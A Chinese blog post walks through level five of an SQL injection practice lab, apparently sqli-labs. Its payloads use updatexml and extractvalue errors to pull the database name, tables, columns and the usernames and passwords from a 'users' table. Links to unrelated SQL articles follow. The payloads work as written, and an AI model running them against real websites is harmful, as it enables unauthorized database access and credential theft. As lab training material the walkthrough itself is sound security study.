SQL注入靶场（第五关）

时间：2024-12-02 18:58:20浏览次数：5

标签：0x7e 第五报错 select --+ SQL 靶场 id concat

报错注入

1.判断是否存在注入

?id=1

?id=1'

报错，闭合点为 ' ，初步判断为字符型

2.判断注入类型

?id=1' and '1'='1
?id=1' and '1'='2

注入类型为字符型

3.猜字段名

?id=1' order by 3--+
?id=1' order by 4--+

有三个字段

4.确定回显位

?id=-1' union select 1,2,3--+

不报错，没有回显位，考虑报错注入

什么是报错注入

报错注入是通过特殊函数的错误使用从而导致报错，并使其输出错误结果来获取信息的。简单点说，就是在注入点调用特殊的函数执行，利用函数报错使其输出错误结果来获取数据库的相关信息（我们要的信息就包含在页面的报错信息中）。

常见的报错注入

双查询报错注入、exp函数报错注入、Extractvalue函数报错注入、updatexml函数报错注入、join语句报错注入、GeometryCollection函数报错注入等。

5.爆出数据库名

方法一

?id=-1' union select (updatexml(1,concat(0x7e,(select database()),0x7e),1))--+

方法二

?id=1' and  extractvalue(1,concat(1,(database())))--+

6.爆出表名

方法一

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 0,1),0x7e),1)--+

?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = database() limit 3,1),0x7e),1)--+

方法二

?id=1' and  extractvalue(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema= 'security')))--+

7.爆出字段名

方法一

?id=1' and  updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema ='security' and table_name = 'users' limit 0,1),0x7e),1)--+

?id=1' and  updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema ='security' and table_name = 'users' limit 1,1),0x7e),1)--+

?id=1' and  updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema ='security' and table_name = 'users' limit 2,1),0x7e),1)--+

方法二

?id=1' and  extractvalue(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema= 'security' and table_name='users')))--+

8.查询具体数据

方法一

?id=1' and  updatexml(1,concat(0x7e,(select username from  users limit 0,1),0x7e),1)--+

?id=1' and  updatexml(1,concat(0x7e,(select password from  users limit 0,1),0x7e),1)--+

方法二

?id=1' and  extractvalue(1,concat(0x7e,(select username from  users limit 0,1),0x7e))--+

?id=1' and  extractvalue(1,concat(0x7e,(select password from  users limit 0,1),0x7e))--+

一次只能查询单个数据

?id=1' and  extractvalue(1,concat(1,(select group_concat(username,'~',password) from users)))--+

标签：0x7e,第五,报错,select,--+,SQL,靶场,id,concat
From： https://blog.csdn.net/2401_88387979/article/details/144195945

SQL注入靶场（第四关）
1.判断是否存在注入?id=1?id=2?id=1"报错，闭合点为")，初步猜测为字符型2.判断注入类型?id=1"and"1"="1?id=1"and"1"="2注入类型为字符型3.猜字段?id=1")orderby3--+?id=1")orderby4--+有三个字段4.确定回显位?i......
揭秘UGO SQL审核功能4大特性，让业务平滑迁移至GaussDB
业务挑战数据库是企业应用系统的核心，SQL作为数据库查询、更新等操作的标准语言，重要性不言而喻。然而在实际的SQL开发过程中，也面临着诸多挑战：数据库应用开发人员的SQL能力良莠不齐，经常写出不符合标准、执行性能差的SQL，当这些风险SQL流入生产环境，必然会对应用系统造成极大影响。......
高效集成：将聚水潭数据导入MySQL的实战案例
聚水潭数据集成到MySQL：店铺信息查询案例分享在数据驱动的业务环境中，如何高效、准确地实现跨平台的数据集成是每个企业面临的重要挑战。本文将聚焦于一个具体的系统对接集成案例——将聚水潭的店铺信息查询结果集成到MySQL数据库中，以供BI系统进行进一步的数据分析和处理。本次集......
mysql 文本函数
--1、替换回车或换行用char(13)或者char(10)试试--select异议from--(-- selectreplace(replace(异议1s,char(13),""),char(10),"")as"异议"from`语句合并`--)ast1--字符串--字符的链接--selectconcat("ss","sdf")--字符串的位置--sel......
基于SpringBoot的中小企业设备管理系统的设计与实现(源码+SQL脚本+LW+部署讲解等)
专注于大学生项目实战开发,讲解,毕业答疑辅导，欢迎高校老师/同行前辈交流合作✌。技术范围：SpringBoot、Vue、SSM、HLMT、小程序、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、安卓app、大数据、物联网、机器学习等设计与开发。主要内容：免费功能设计、开题报告、任务书、中......
基于SpringBoot的论坛网站系统的设计与实现(源码+SQL脚本+LW+部署讲解等)
专注于大学生项目实战开发,讲解,毕业答疑辅导，欢迎高校老师/同行前辈交流合作✌。技术范围：SpringBoot、Vue、SSM、HLMT、小程序、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、安卓app、大数据、物联网、机器学习等设计与开发。主要内容：免费功能设计、开题报告、任务书、中......
C# 启用数据库通知刷新（SqlDependency）
‌SqlDependency‌是一种功能，用于在数据库中的数据发生变化时自动触发事件，通知应用程序更新数据或缓存。它适用于ASP.NET和ASP.NETCore应用程序，特别是在需要实时响应数据变化的场景中非常有用。使用方法1‌.启用数据库的通知服务‌：首先需要在数据库中启用通知服务。对于SQLS......
SQL面试题——抖音SQL面试题共同问题—共同使用ip用户检测问题
共同使用ip用户检测问题现有用户登录日志表，记录了每个用户登录的IP地址，请查询共同使用过3个及以上IP的用户对；+---+--------------+-------------------+|id|ip|etime|+---+--------------+-------------------+|2|223.104.41.101|2023-08......
mysql 之查询条件！=或者<>存在问题，会被轻易忽略而且影响查询结果
mysql数据库查询，我们再使用sql条件时会经常使用！=（<>）,但使用！=之后，这个字段对应的为空的值不会查出来。所以建议!=长春与isnull同时用查询结果测试如下：我们先查询满足条件的数据；id上下相同，同时此id的对应的paln_status查询如图是空的：咱们再来查询总体满足业务场景的语句！=同时......
C#毕业设计下载（全套源码+配套论文）——基于C#+asp.net+sqlserver的报表管理系统设计与
基于C#+asp.net+sqlserver的报表管理系统设计与实现（毕业论文+程序源码）大家好，今天给大家介绍基于C#+asp.net+sqlserver的报表管理系统设计与实现，更多精选毕业设计项目实例见文末哦。文章目录：基于C#+asp.net+sqlserver的报表管理系统设计与实现（毕业论文+程序源码）1、项......